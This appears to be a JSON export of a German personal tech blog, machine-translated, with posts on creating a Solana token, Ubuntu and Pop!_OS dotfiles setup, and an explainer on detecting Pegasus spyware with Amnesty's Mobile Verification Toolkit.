die Datei solana.tokenlist.json.\nGehen Sie zum Ende der Datei und fügen Sie dann Ihr Token im JSON-Format hinzu; Es ist am einfachsten, die Informationen aus dem Token vor Ihrem zu kopieren und einzufügen und dann die Werte zu ändern.\nAuf der linken Seite befindet sich ein Symbol mit drei Punkten; Klicken Sie darauf, fügen Sie dann eine Nachricht darüber hinzu, was Sie tun, und klicken Sie auf das Häkchen.\nGehen Sie dann zurück zu Solanas GitHub und fordern Sie eine Pull-Anforderung an.\nFühren Sie die Zusammenführung durch und warten Sie, bis der Vorgang beendet ist. Solana führt stündlich eine Überprüfung durch, sodass Ihre Pull-Anforderung möglicherweise erst nach einer Stunde empfangen wird.\nEndprodukt # Schlussfolgerung # Es ist ein spannendes Projekt; man kann viel lernen, insbesondere über Kryptowährungen und wie sie funktionieren. Derzeit hat dieses Projekt keine Anwendung und ist kein Projekt, mit dem Sie Geld verdienen können, aber Wissen reicht aus.\nVielen Dank für Ihre Zeit 💙 # ","date":"22 Januar 2022","permalink":"/de/blog/hsky-token/","section":"Blogs","summary":"💸 HSKY Token 💸 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Was ist ein Krypto-Token? # Heutzutage verwenden immer mehr Menschen Kryptowährungen; Einige berühmte sind Bitcoin, Dogecoin, Etherium, Solana usw.","title":"HSKY Krypto-Token"},{"content":" 💻 Ubuntu mit einem nordischen Thema 💻 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Dies sind meine aktuellen Dotfiles von Ubuntu Linux.\nDie Installation hilft Ihnen dabei, das gleiche Aussehen wie auf den Bildern zu erzielen. Hier sind die Schritt-für-Schritt-Anleitungen.\nSystem-Spezifikationen:\nOS: Ubuntu GTK Thema: Nordic Icon Thema: Flatery_Dark Cursor Thema: Oreo_Blue Browser: Firefox Installation # Ich gehe davon aus, dass Sie Ubuntu 20.04 mit minimaler Installation frisch installiert haben, um mit diesem Aussehen zu beginnen.\nWenn Sie sich dafür interessieren, was eine Anwendung tut, hilft Ihnen Wikipedia weiter.\nRepository-Upgrade und System-Upgrade # sudo apt update sudo apt upgrade Installation der Gnome Tweak Tool # Wir müssen zuerst das Gnome Tweak Tool installieren, um die Gnome-Erweiterungen zu installieren.\nInstallation der Gnome Tweak Tool: sudo apt install gnome-shell-extensions Öffnen Sie dann Firefox und gehen Sie zu Verknüpfung und laden Sie das Add-on herunter.\nLaden Sie die erforderlichen Add-Ons herunter:\nNach dem Herunterladen des Gnome-Erweiterungs-Add-Ons müssen wir den Schieberegler für einige Add-Ons auf Ein stellen. Sie finden sie unter den folgenden Links:\nDash to Panel User Themes Transparent Window Moving Stellen Sie dann sicher, dass sie im Betriebssystem enthalten sind, indem Sie die Gnome Tweak Tool-App öffnen und sicherstellen, dass die oben genannten Add-Ons enthalten sind; Deaktivieren Sie außerdem die Desktop-Symbole.\nHINWEIS: Sie können das Dash in den Einstellungen nach Belieben auf Panel setzen (um Symbole zu verkleinern usw.). Außerdem sind meine Einstellungen für das Verschieben von transparentem Fenster auf 0,2. Installation von Pop Shell # sudo apt install git node-typescript make Nach der Installation der erforderlichen Abhängigkeiten müssen wir im Terminal zum Ordner Downloads gehen.\ncd ~/Downloads Dann müssen wir das Repository klonen:\ngit clone https://github.com/pop-os/shell.git Dann betreten wir den Shell-Ordner:\ncd shell Installation von Pop Shell:\nmake local-install Installation anderer Anwendungen # Installation von neofetch: sudo apt install neofetch Installation von zathura: sudo apt install zathura Installation von tty-clock: sudo apt install tty-clock Installation von cmatrix: sudo apt install cmatrix Installation von htop: sudo apt install htop Installation von ranger: sudo apt install ranger Installation von Vim: sudo apt install vim Installation von Lollypop: sudo apt install lollypop Installation von cbonsai: cd ~/Downloads sudo apt install libncursesw5-dev git clone https://gitlab.com/jallbrit/cbonsai cd cbonsai make install PREFIX=~/.local Installation von tty-tetris: cd ~/Downloads sudo apt install cmake git clone https://github.com/Holixus/tty-tetris-v2.git cmake . make sudo make install Installation von Cava: Wir installieren zuerst die notwendigen Abhängigkeiten:\nsudo apt install libfftw3-dev libasound2-dev libncursesw5-dev libpulse-dev libtool automake libiniparser-dev export CPPFLAGS=-I/usr/include/iniparser Dann gehen wir zum Downloads-Ordner und klonen das Cava-Repository:\ncd ~/Downloads git clone https://github.com/karlstav/cava.git Dann müssen wir Cava kompilieren:\ncd cava ./autogen.sh ./configure make Jetzt können wir Cava installieren:\nsudo make install Installation von Ttyper: sudo apt install cargo sudo apt install ttyper Installation des GRUB thema # Repository-Klonen: cd ~/Downloads git clone https://github.com/semimqmo/sekiro_grub_theme Installation des GRUB thema: sudo ./install.sh Verschiedene Themeninstallationen # GTK Thema: Nordic Icon Thema: Flatery_Dark Cursor Thema: Oreo_Blue HINWEIS: Um diese Designs zu installieren, müssen Sie zwei versteckte Ordner im Home-Verzeichnis erstellen. cd ~/ mkdir .themes mkdir .icons In den Ordner .themes müssen wir das GTK-Thema und das Icon-Thema einfügen, und in den .icons-Ordner müssen wir das Cursor-Thema einfügen. Dann müssen wir sie über die Gnome Tweak Tools-Anwendung aktivieren.\nErstellen oder laden Sie eine vorhandene Startseite herunter und fügen Sie sie zu Firefox hinzu.\nÄndern Sie das Hintergrundbild mit dem Gnome Tweak Tool.\nWikipedia # Nachdem wir diese GNOME-Konfiguration vorgenommen haben, ist es an der Zeit zu klären, was jede Anwendung tut.\n🧠 [Pop Shell]\nPop Shell gibt uns die Möglichkeit, den Tilling Window Manager auf dem Desktop-System zu verwenden, der die Fenster per Skript auf dem Bildschirm anordnet und so Platz auf dem Bildschirm spart.\n⌨️ [Neofetch]\nNeofetch ist ein Befehl, der uns Systemspezifikationen liefert und außerdem ein cooles Aussehen hat.\n🍫 [Zathura]\nZathura ist ein PDF Reader, bei dem es möglich ist, das Layout und viele andere Optionen mit einer einzigen Konfigurationsdatei zu ändern.\n🐚 [Ranger]\nRanger dient uns als Dateimanager im Terminal.\n📋 [Vim] texteditor\nDa viele Leute Notepad auf Windows-Betriebssystemen verwenden, verwenden wir Nano und Vim.\nDer Nano-Texteditor ist viel einfacher zu bedienen, während der Vim aufgrund seiner Verknüpfungen eher für Entwickler gemacht ist.\n🌳 [cbonsai]\nCbonsai ist ein Skript, das in unserem Terminal einen Baum aus Zeichen, Buchstaben und Zahlen erstellt.\n🎮 [tty-tetris]\nTty-Tetris ist eine Anwendung, mit der wir Tetris auf dem Terminal spielen können.\n📰 [ttyper]\nTtyper ist eine Anwendung, die die Tippgeschwindigkeit im Terminal misst.\n🕶️ [Nordic] GTK thema.\nNordic Dark ist ein GTK-Thema (Thema für Benutzeroberflächenanwendungen), das Anwendungen mit einer Benutzeroberfläche ein dunkles Aussehen verleiht.\n🔷 [Flattery] icon thema.\nWie der Name schon sagt, haben Anwendungen, die eine Benutzeroberfläche haben, meistens Symbole, die wir mit der Maus anklicken können; Dieses Thema gibt uns ein anderes Aussehen der Symbole.\n🔵 [Oreo Blue] cursor thema.\nDieses Thema gibt uns einen blauen Cursor-Look; Es wurde nur wegen des Aussehens eingefügt und weil es zu allen anderen Farben dieses Betriebssystems passt.\n🔥🦊 [Firefox] Web-Browser.\nIch verwende Firefox, weil es meiner Meinung nach einer der besten datenschutzorientierten Webbrowser ist.\n⏰ tty-clock\nTty-clock ist eine Anwendung, die darauf abzielt, die Uhrzeit und das Datum im Terminal anzuzeigen.\n🎚️ CAVA Audio-Visualisierer.\nCava ist eine Anwendung, die als Audiovisualisierer dient.\n📈 HTop\nDie HTop-Anwendung zeigt, welche Prozessoren gerade laufen und wie viel RAM sie belegen, und viele andere Dinge. Stellen Sie sich HTop als Task-Manager in Windows vor.\n😎 CMatrix\nCMatrix ist eine Anwendung, die nur zum Anschauen da ist, und ihr Zweck ist es, Text in einem offenen Terminal zu drucken, der darauf abzielt, eine Anzeige von Hacking aus dem Matrix-Film zu geben.\n🤠 Ranger\nRanger ist eine Anwendung, mit der wir alle Dateien auf dem Computer im Terminal sehen und darauf zugreifen können.\n🍭 Lollypop\nLollypop ist eine Musik-App, mit der wir Lieder abspielen.\nVielen Dank für Ihre Zeit 💙 # ","date":"19 Oktober 2021","permalink":"/de/blog/gnome-ubuntu-nordic/","section":"Blogs","summary":"💻 Ubuntu mit einem nordischen Thema 💻 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Dies sind meine aktuellen Dotfiles von Ubuntu Linux.","title":"[GNOME] Ubuntu Nodric"},{"content":"","date":"21 Juli 2021","permalink":"/de/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity"},{"content":" 🔍 NSO Pegasus Spyware 🔍 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Was ist Pegasus-Spyware? # Am Wochenende sickerten Nachrichten durch, dass mehrere autoritäre Regierungen (darunter Mexiko, Marokko und die Vereinigten Arabischen Emirate) Spionagesoftware verwendeten, die von der israelischen Firma NSO Group entwickelt wurde. Ihr Ziel war es, Politiker, Aktivisten und Journalisten auszuspionieren. Eine Liste mit 50.000 Telefonnummern, die möglicherweise für Spionagezwecke genutzt werden, ist in den Besitz der gemeinnützigen Pariser Organisation Forbidden Stories und Amnesty International , die sie mit der Öffentlichkeit The Washington Post und The Guardian geteilt haben.\nNachdem Cybersicherheitsforscher mehrere Telefone von Opfern dieses Angriffs analysiert hatten, stellten sie fest, dass es sich um eine komplexe Malware handelt, die auf alle Daten auf dem Telefon zugreifen kann, von Nachrichten und Anrufen bis hin zu Ihren Fotos, und das Schlimmste ist, dass Pegasus es Ihnen ermöglicht nehmen Sie Gespräche auf und greifen Sie auf das Mikrofon und die Kamera zu. Dies bedeutet, dass diese Spyware Sie rund um die Uhr verfolgen und aufzeichnen kann, was Sie sagen, tun und wo Sie sich befinden.\nAußerdem wurde diese Spyware sowohl für iOS- als auch für Android-Betriebssysteme entwickelt.\nWie Pegasus funktioniert ? # Pegasus arbeitet mit dem sogenannten. \u0026ldquo;0-Day-Exploits\u0026rdquo;. Dies sind Systemfehler, von denen fast niemand weiß, nicht einmal die Unternehmen hinter Betriebssystemen, Elektronik usw. Eine einfachere Erklärung ist, dass Apple nicht weiß, dass diese Fehler im Code vorhanden sind, weshalb es „Bug Bounty“ gibt \u0026ldquo;Programme, für die sich Cybersicherheitsforscher anmelden. Sie suchen nach Fehlern im System und werden je nach Auswirkung dieses Fehlers mit Geld belohnt. Nehmen wir natürlich an, Cybersicherheitsforscher erkennen Codefehler (Bugs) nicht vor Hackern mit bösen Absichten. In diesem Fall ist dies ein Problem und trägt zur Entwicklung verschiedener bösartiger Software wie Pegasus bei. Soweit wir wissen, reicht es aus, nur einen Anruf oder eine SMS zu erhalten (die Sie nicht anklicken oder beantworten müssen), um Ihr iOS- oder Android-Gerät zu infizieren.\nWie lösche ich diese Spyware von Ihrem Mobilgerät? # Es gibt keine Möglichkeit, Pegasus von Ihrem mobilen Gerät zu entfernen, aber der beste Rat ist, Ihr mobiles Betriebssystem ständig auf die neueste Version zu aktualisieren. Die letzte bekannte Version von iOS, die für diese Hacking-Methode anfällig ist, ist iOS 14.6.\nWie erkennt man Pegasus? # Pegasus ist schwer zu erkennen, nachdem es auf Ihrem Mobilgerät installiert wurde, und es ist so konzipiert, dass es von selbst gelöscht wird, falls es die falsche Telefonnummer erhält oder erkennt, dass das Gerät länger als 60 Tage nicht aktiv war. Derzeit wurden mehrere IOCs (Indicators of Compromise) gefunden, die Sie auf AmnestyTech Github finden können.\nWie führen Sie digitale Forensik auf Ihrem Gerät durch? # Jetzt zeige ich Ihnen, wie Sie digitale Forensik auf Ihrem Gerät durchführen, mit der Sie überprüfen können, ob Sie mit dieser Spyware infiziert sind.\nErforderlich:\nBetriebssystem: Kali Linux Programm: MVT (Mobile Verification Toolkit) IOCs: AmnestyTech IOCs Anweisungen # Nach der Installation oder dem Booten des Betriebssystems Kali Linux in der virtuellen Maschine müssen wir als erstes das Systemupdate durchführen.\nIn diesem Beispiel verwende ich Kali Linux, aber jede auf Debian Linux basierende Distribution sollte mit geringfügigen Unterschieden in den Befehlen funktionieren.\nAktualisieren von Kali Linux # Wir öffnen das Terminal und geben die folgenden Befehle ein:\nsudo apt update sudo apt upgrade Installation von MVT # Wir müssen zuerst ein paar \u0026ldquo;Abhängigkeiten\u0026rdquo; installieren, damit das MVT richtig funktioniert.\nInstallation von Abhängigkeiten: sudo apt install python3 python3-pip libusb-1.0-0 git Installation von MVT:\nNach der Installation der Abhängigkeiten installieren wir das MVT. Zuerst betreten wir das Downloads-Verzeichnis.\ncd Downloads Dann müssen wir MVT von GitHub herunterladen: git clone https://github.com/mvt-project/mvt.git Wir betreten nun das heruntergeladene MVT-Verzeichnis: cd mvt Wir installieren MVT jetzt mit diesem Befehl: pip3 install . Hinzufügen einer PATH-Variablen: export PATH=$PATH:/home/*USERNAME*/.local/bin Hinweis: BENUTZERNAME müssen Sie abhängig vom Benutzernamen unter Linux ändern. Herunterladen von IOCs # Wir werden zuerst das Verzeichnis im Ordner Downloads ändern: cd ~/Downloads Dann klonen wir das Repository: git clone https://github.com/AmnestyTech/investigations.git Digitale Forensik auf iOS-Geräten. # Wenn Sie ein iOS-Gerät (Apple) haben, befolgen Sie die nachstehenden Anweisungen; Falls nicht, finden Sie Anleitungen für Android-Systeme unter Digitale Forensik auf Android-Geräten.\nEine Kopie des Systems Ihres Geräts # Der erste Schritt in diesem Prozess besteht darin, die Betriebssystemdatei auf dem Mobiltelefon zu sichern, damit wir sie analysieren können. Es gibt zwei Methoden Dateisystem-Dump und iTunes-Sicherung.\nDateisystem-Dump ist eine Methode, die einen Jailbreak eines iOS-Systems erfordert, das Sie mit checkra1n ausführen können. Die Vorteile dieser Methode bestehen darin, dass Sie das gesamte System \u0026ldquo;dumpen\u0026rdquo; und damit weitere Daten extrahieren können, aber leider verliert das Jailbreaking des iPhone die Garantie und einige iPhones mit bestimmten iOS-Versionen können nicht jailbreakt werden.\niTunes Backup ist eine alternative Option, obwohl dadurch weniger Daten erneut extrahiert werden und die Garantie Ihres Geräts erhalten bleibt.\nHINWEIS: Sie können mehr Daten mit der iTunes-Sicherungsmethode extrahieren, wenn Sie eine verschlüsselte Sicherung verwenden. Backup von iOS mit iTunes # Sie können iTunes auf einem Windows-Gerät sichern. Anweisungen:\nInstallieren Sie iTunes auf Ihrem Computer oder Laptop. Verbinden Sie das iPhone mit einem Kabel mit Ihrem Computer oder Laptop. Öffnen Sie Ihr iPhone in iTunes. Wenn Sie bessere Ergebnisse erzielen möchten, wählen Sie die verschlüsselte Backup-Option. Führen Sie eine Sicherung durch; es kann bis zu 30 Minuten dauern. Sobald die Sicherung abgeschlossen ist, finden Sie ihren Speicherort auf Windows 10-Betriebssystemen in einem von zwei Ordnern:\n%USERPROFILE%\\Apple\\MobileSync\\ %USERPROFILE%\\AppData\\Roaming\\Apple Computer\\MobileSync\\ Der einfachste Weg, sie zu finden, besteht darin, %USERPROFILE% in die Suchleiste einzufügen und den Ordner manuell zu überprüfen. Der wichtige Ordner ist der Ordner mit UDID (ein Ordner namens 0000 [ZENSIERT]).\nSicherungskopie entschlüsseln: # Wenn Sie Ihr Backup verschlüsselt haben, übertragen wir es auf einen Computer oder eine virtuelle Maschine mit Linux (in diesem Beispiel verschiebe ich die Datei von USB in den Ordner „Dokumente“). dann müssen wir einen Ordner zum Entschlüsseln erstellen:\nmkdir ~/Documents/decrypted Jetzt entschlüsseln wir die Datei:\nmvt-ios decrypt-backup -p \u0026#39;IHR_PASSWORT\u0026#39; -d ~/Documents/decrypted ~/Documents/0000[REDACTED] Dieser Befehl dauert je nach Gewicht der Kopie sehr lange. Sobald die Entschlüsselung abgeschlossen ist, ist es an der Zeit, einen Ausgabeordner zu erstellen:\nmkdir ~/Downloads/output_forensics Danach bleibt uns nur noch ein Befehl, der einen Scan mit einer strix2-Datei durchführt und prüft, ob das iPhone mit Pegasus infiziert ist oder nicht.\nmvt-ios check-backup -i ~/Downloads/investigations/2021-07-18_nso/pegasus.strix2 -o ~/Downloads/output_forensics ~/Documents/decrypted Digitale Forensik auf Android-Geräten # Die digitale Forensik auf Android-Geräten ist viel komplizierter; MVT bietet derzeit zwei Methoden an.\nDurch Herunterladen und Analysieren der installierten APK-Dateien. Durch Extrahieren von Android-Backups und Suchen nach verdächtigen SMS-Nachrichten. Überprüfung der APK-Datei # Um die MVT-Option mvt-android zu verwenden, muss Ihr Android-Gerät mit Linux verbunden sein. Sie müssen die USB-Debugging-Option auf Ihrem Telefon aktivieren.\nDann müssen Sie bei der ersten Verbindung die Verbindung des Geräts auf Android bestätigen, damit wir unter Linux einen Ausgabeordner erstellen können:\nmkdir ~/Downloads/output_forensics Sie können dann den folgenden Befehl ausführen:\nmvt-android download-apks -o ~/Downloads/output_forensics Sie können auswählen, wo Sie die auf VirusTotal extrahierten SHA256-Hash-APKs anzeigen möchten. Dies kann dabei helfen, bösartige APK-Dateien (Anwendungen) auf Ihrem Android-Gerät zu identifizieren. Das machen wir mit dem Befehl:\nmvt-android download-apks -o ~/Downloads/output_forensics --virustotal Prüfung auf schädliche SMS-Nachrichten # Diese Methode verwendet das MVT, um zu überprüfen, ob Ihr Android-Gerät mit bösartigen SMS infiziert ist. Ich gehe davon aus, dass Sie Ihr Gerät bereits wie in den Anweisungen für APK-Dateien verbunden haben. Jetzt führen wir diesen Befehl aus:\nadb backup com.android.providers.telephony Wir müssen das Backup auf Ihrem Telefon genehmigen und möglicherweise Ihr Backup-Passwort eingeben. Das Backup wird dann in einem Ordner namens backup.ab gespeichert.\nDann müssen wir Android Backup Extractor verwenden, um die zuvor erhaltene Datei in ein lesbares Format zu konvertieren. Java muss auf dem System installiert sein!\nFühren Sie dann die folgenden Befehle aus:\njava -jar ~/Downloads/abe.jar unpack backup.ab backup.tar tar xvf backup.tar Android Backup Extractor fragt Sie nach dem Passwort, wenn das Backup verschlüsselt ist.\nDann prüft MVT, ob in SMS-Nachrichten bösartige Links enthalten sind; wir machen es mit dem Befehl:\nmvt-android check-backup -o sms . Mit den Optionen \u0026ndash;iocs oder \u0026ndash;i können wir die IOCs-Datei spezifizieren.\nWelche Dateien erstellt und prüft mvt-ios dann? # Nachdem das MVT die Analyse abgeschlossen hat, schreibt Ihnen das Terminal eine Warnung (verdächtige Datei), wenn Ihr Gerät mit Pegasus infiziert ist. Sie sehen nun alle Dateien, die MVT erstellt und während der Analyse überprüft hat.\n💵 [cache_files.json]\nDiese JSON-Datei erstellt das CacheFiles-Modul. Das Modul extrahiert Datensätze aus allen SQLite-Datenbankdateien, die auf einer Festplatte mit dem Namen Cache.db gespeichert sind. Diese Datenbanken enthalten normalerweise Daten aus dem internen iOS-URL-Caching.\nSie können dieses Modul verwenden, um HTTP-Anforderungen und -Antworten anzuzeigen. Dies ist nützlich, da wir HTTP-Anforderungen sehen können, die Teil der „Ausbeutungskette“ sind und vom iOS-Dienst ausgeführt werden, der versucht, während der ersten Phase dieser Anforderung eine bösartige Datei herunterzuladen.\n📱 [calls.json]\nDiese JSON-Datei erstellt das Calls-Modul. Das Modul extrahiert Datensätze aus der SQLite-Datenbank, die sich unter /private/var/mobile/Library/CallHistoryDB/CallHistory.store befindet. Daten enthalten eine Liste aller eingehenden und ausgehenden Anrufe, einschließlich Anwendungen wie WhatsApp oder Skype.\n💻 [chrome_favicon.json]\nDiese JSON-Datei erstellt das ChromeFavicon-Modul. Das Modul extrahiert Datensätze aus der SQLite-Datenbank, die sich auf /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/Favicons befindet, und dient dazu, Favicons (kleine Symbole in Ihrer Webbrowser-Tabs) für schnelleres Laden.\nFavicons können gehackt werden; Weitere Informationen zu diesem Thema finden Sie unter LINK .\n💻 [chrome_history.json]\nDiese JSON-Datei erstellt das ChromeHistory-Modul. Das Modul extrahiert Datensätze aus der SQLite-Datenbank unter „/private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/History, die den Verlauf Ihres Google Chrome-Webbrowsers enthält.\n🤓 [contacts.json]\nDiese JSON-Datei erstellt das Modul ** Kontakte **. Das Modul extrahiert Datensätze aus der SQLite-Datenbank unter /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb, die eine Liste Ihrer Kontakte enthält.\n🦊 [firefox_favicon.json]\nDas Modul FirefoxFavicon hat diese JSON-Datei erstellt. Das Modul extrahiert Datensätze aus der SQLite-Datenbank, die sich auf /private/var/mobile/profile.profile/browser.db befindet, und dient dazu, Favicons (kleine Symbole in den Registerkarten Ihres Webbrowsers) zum schnelleren Laden zu speichern.\n🦊 [firefox_history.json]\nDas Modul FirefoxHistory hat diese JSON-Datei erstellt. Das Modul extrahiert Datensätze aus der SQLite-Datenbank unter /private/var/mobile/profile.profile/browser.db und enthält den Verlauf Ihres Firefox-Webbrowsers.\n📋 [id_status_cache.json]\nDiese JSON-Datei erstellt das IDStatusCache-Modul. Das Modul extrahiert Datensätze aus der Plist-Datei unter /private/var/mobile/Library/Preferences/com.apple.identityservices.idstatuscache.plist, die Ihre Apple-ID-Muster speichert (dies umfasst biometrische Daten wie Touch- und Face-ID).\n🤝 [interaction_c.json]\nDiese JSON-Datei erstellt das InteractionC-Modul. Das Modul extrahiert Datensätze aus der SQLite-Datenbank unter /private/var/mobile/Library/CoreDuet/People/interactionC.db und enthält Details zu Benutzerinteraktionen mit installierten Anwendungen.\n📍 [locationd_clients.json]\nDiese JSON-Datei erstellt das LocationdClients-Modul. Das Modul extrahiert Datensätze aus der Plist-Datei, die sich unter /private/var/mobile/Library/Caches/location/clients.plist befindet, und enthält zwischengespeicherten Speicher von Anwendungen, die Zugriff auf Ortungsdienste angefordert haben.\n🔷 [manifest.json]\nDas Modul Manifest hat diese JSON-Datei erstellt. Das Modul extrahiert Datensätze aus der SQLite-Datenbank Manifest.db, die von iTunes während des Backups erstellt wurde, und dient dazu, dem lokalen Backup mitzuteilen, wo sich alle Dateien auf dem iOS-Gerät befinden.\n💽 [datausage.json]\nDiese JSON-Datei erstellt das Datausage-Modul. Das Modul extrahiert Datensätze aus der SQLite-Datenbank, die sich in /private/var/wireless/Library/Databases/DataUsage.sqlite befindet. Es enthält den Verlauf der Datennutzung durch die auf dem System verwendeten Prozesse.\n💻 [safari_browser_state.json]\nDiese JSON-Datei erstellt das SafariBrowserState-Modul. Das Modul extrahiert Datensätze aus SQLite-Datenbanken, die sich auf /private/var/mobile/Library/Safari/BrowserState.db oder /private/var/mobile/Containers/Data/Application/*/Library/Safari/BrowserState.db befinden , und enthalten eine Liste der geöffneten Registerkarten im Safari-Webbrowser.\n💻 [safari_favicon.json]\nDiese JSON-Datei erstellt das SafariFavicon-Modul. Das Modul extrahiert Datensätze aus SQLite-Datenbanken, die sich auf /private/var/mobile/Library/Image Cache/Favicons/Favicons.db oder /private/var/mobile/Containers/Data/Application/*/Library/Image Cache/ befinden. Favicons/Favicons.db und dient zum Speichern von Favicons (kleine Symbole in den Registerkarten Ihres Webbrowsers) zum schnelleren Laden.\n🔥 [safari_history.json]\nDiese JSON-Datei erstellt das SafariHistory-Modul. Das Modul extrahiert Datensätze aus SQLite-Datenbanken, die sich auf /private/var/mobile/Library/Safari/History.db oder /private/var/mobile/Containers/Data/Application/*/Library/Safari/History.db befinden , die den Suchverlauf enthalten.\n📝 [sms.json]\nDiese JSON-Datei erstellt ein SMS-Modul. Das Modul extrahiert eine Liste von SMS-Nachrichten mit HTTP-Links aus der SQLite-Datenbank unter /private/var/mobile/Library/SMS/sms.db.\n📝 [sms_attachments.json]\nDiese JSON-Datei erstellt das SMSAttachments-Modul. Das Modul extrahiert Details zu per SMS oder iMessage gesendeten Anhängen aus derselben Datenbank, die auch vom SMS-Modul verwendet wird.\n📜 [version_history.json]\nDiese JSON-Datei erstellt das IOSVersionHistory-Modul. Das Modul extrahiert iOS-Update-Datensätze aus den Analyselistendateien, die sich unter /private/var/db/analyticsd/Analytics-Journal-*.Ips befinden.\n🕸️ [webkit_indexeddb.json]\nDiese JSON-Datei erstellt das WebkitIndexedDB-Modul. Das Modul extrahiert eine Liste von Dateien und Ordnern, die sich in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/IndexedDB befinden, und enthält IndexedDB-Dateien, die von einer beliebigen Anwendung erstellt wurden.\n🕸️ [webkit_local_storage.json]\nDiese JSON-Datei erstellt das WebkitLocalStorage-Modul. Das Modul extrahiert eine Liste von Datei- und Ordnernamen, die in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/LocalStorage/ gefunden werden, und enthält Dateien aus dem internen Speicher, die von einer beliebigen Anwendung erstellt wurden.\n🕸️ [webkit_safari_view_service.json]\nDiese JSON-Datei erstellt das WebkitSafariViewService-Modul. Das Modul extrahiert eine Liste von Datei- und Ordnernamen, die in /private/var/mobile/Containers/Data/Application/*/SystemData/com.apple.SafariViewService/Library/WebKit/WebsiteData/ gefunden werden, und enthält Dateien, die von SafariVewService zwischengespeichert werden .\n🕸️ [webkit_session_resource_log.json]\nDiese JSON-Datei erstellt das WebkitSessionResourceLog-Modul. Das Modul extrahiert Datensätze aus Plist-Dateien mit dem Namen full_browsing_session_resourceLog.plist und enthält Ressourcendatensätze, die von verschiedenen besuchten Webseiten geladen wurden.\n📞 [whatsapp.json]\nDiese JSON-Datei wurde vom WhatsApp-Modul erstellt. Das Modul extrahiert eine Liste von WhatsApp-Nachrichten, die HTTP-Verbindungen enthalten, aus der SQLite-Datenbank, die sich unter /private/var/mobile/Containers/Shared/AppGroup/*/ChatStorage.sqlite befindet.\nSchlussfolgerung # Pegasus ist eines der gefährlichsten Werkzeuge für Spionage, ich bin mit den Aktionen des Unternehmens der NSO Group nicht einverstanden, und ich denke, jeder hat das Recht auf Privatsphäre. Derzeit könnte der einzige Schutz gegen Pegasus ein Telefon sein, das weder Android noch iOS ist. Eine gute Alternative ist das Nokia 8110 4G mit dem Betriebssystem GerdaOS . Ich empfehle, sich das Interview von The Guardian mit Edward Snowden zum Thema anzusehen Pegasus.\nDanke für deine Zeit 💙 # ","date":"21 Juli 2021","permalink":"/de/blog/nso-pegasus-spyware/","section":"Blogs","summary":"🔍 NSO Pegasus Spyware 🔍 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Was ist Pegasus-Spyware? # Am Wochenende sickerten Nachrichten durch, dass mehrere autoritäre Regierungen (darunter Mexiko, Marokko und die Vereinigten Arabischen Emirate) Spionagesoftware verwendeten, die von der israelischen Firma NSO Group entwickelt wurde.","title":"NSO Pegasus Spyware"},{"content":"","date":"21 Juli 2021","permalink":"/de/categories/privacy/","section":"Categories","summary":"","title":"Privacy"},{"content":" 🖥️ Pop! Linux-Konfigurationsdateien 🖥️ Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Dies sind meine aktuellen Dotfiles von Pop! Betriebssystem der Linux-Distribution.\nDie Installation hilft Ihnen dabei, das gleiche Aussehen wie auf den Bildern zu erzielen. Hier sind die Schritt-für-Schritt-Anleitungen.\nSystemspezifikationen:\nOS: Pop!_OS WM: BSPWM Tastatur-Daemon: Sxhkd Bar: Polybar Setzer: Picom App Launcher: Rofi Terminal: Alacritty Shell: Oh-my-ZSH Shell Thema: Powerlevel10k Texteditor: Vim-Airline Sperrbildschirm: Slim and Slimlock Benachrichtigungen: Dunst GTK Thema: Nordic_Dark Icon Thema: Flatery_Dark Mauszeiger Thema: Oreo_Blue Schriftart: Source_Code_Pro Browser: Firefox Browser Thema: Minimal_Functional_Fox Installation # Um mit diesem Look zu beginnen, nehme ich an, dass Sie einen frisch installierten Pop! Betriebssystem.\nWenn Sie daran interessiert sind, was eine Anwendung tut, hilft Ihnen Wikipedia weiter.\nRepository-Upgrade und System-Upgrade # sudo apt update sudo apt upgrade Installation des BSPWM Tiling Window Managers # Zuerst müssen wir einige notwendige sogenannte Abhängigkeiten installieren, die wir benötigen, um mit der Installation fortzufahren.\nInstallation benötigter Abhängigkeiten: sudo apt install build-essential git vim xcb libxcb-util0-dev libxcb-ewmh-dev libxcb-randr0-dev libxcb-icccm4-dev libxcb-keysyms1-dev libxcb-xinerama0-dev libasound2-dev libxcb-xtest0-dev libxcb-shape0-dev Repository-Klonen: cd ~/Downloads git clone https://github.com/baskerville/bspwm.git BSPWM kompilieren und installieren: cd bspwm make sudo make install Kopieren Sie die BSPWM-Konfigurationsdateien: mkdir ~/.config/bspwm cp examples/bspwmrc ~/.config/bspwm chmod +x ~/.config/bspwm/bspwmrc cd .. Installation des Tastatur-Daemons # Zum Beispiel müssen wir den sogenannten Tastatur-Daemon verwenden, um Tastenkombinationen zum Öffnen eines Terminals, einer anderen Anwendung usw. zu verwenden. Es ist ein Prozess, der im Hintergrund läuft und BSPWM Tilling Window Manager anweist, was zu tun ist, wenn jemand eine bestimmte Tastenkombination drückt auf der Tastatur.\nWenn Sie daran interessiert sind, was ein Shortcut gemäß meinen Einstellungen macht, hilft Ihnen der Shortcut-Abschnitt weiter.\nRepository-Klonen: cd ~/Downloads git clone https://github.com/baskerville/sxhkd.git Kompilieren und Installieren von sxhkd: cd sxhkd make sudo make install Kopieren Sie die sxhkd-Konfigurationsdateien: mkdir ~/.config/sxhkd cp ../bspwm/examples/sxhkdrc ~/.config/sxhkd cd .. HINWEIS: Wenn Sie irgendetwas in der sxhkdrc-Datei ändern, achten Sie darauf, auf welches Terminal Sie eingestellt sind; wenn Sie ein normales Pop-Betriebssystem verwenden! terminal, müssen Sie das Betriebssystem unter dem Terminal-Emulator auf gnome-terminal ändern. Installation von Polybar # Installation der erforderlichen Abhängigkeiten: sudo apt install cmake cmake-data pkg-config python3-sphinx libcairo2-dev libxcb1-dev libxcb-util0-dev 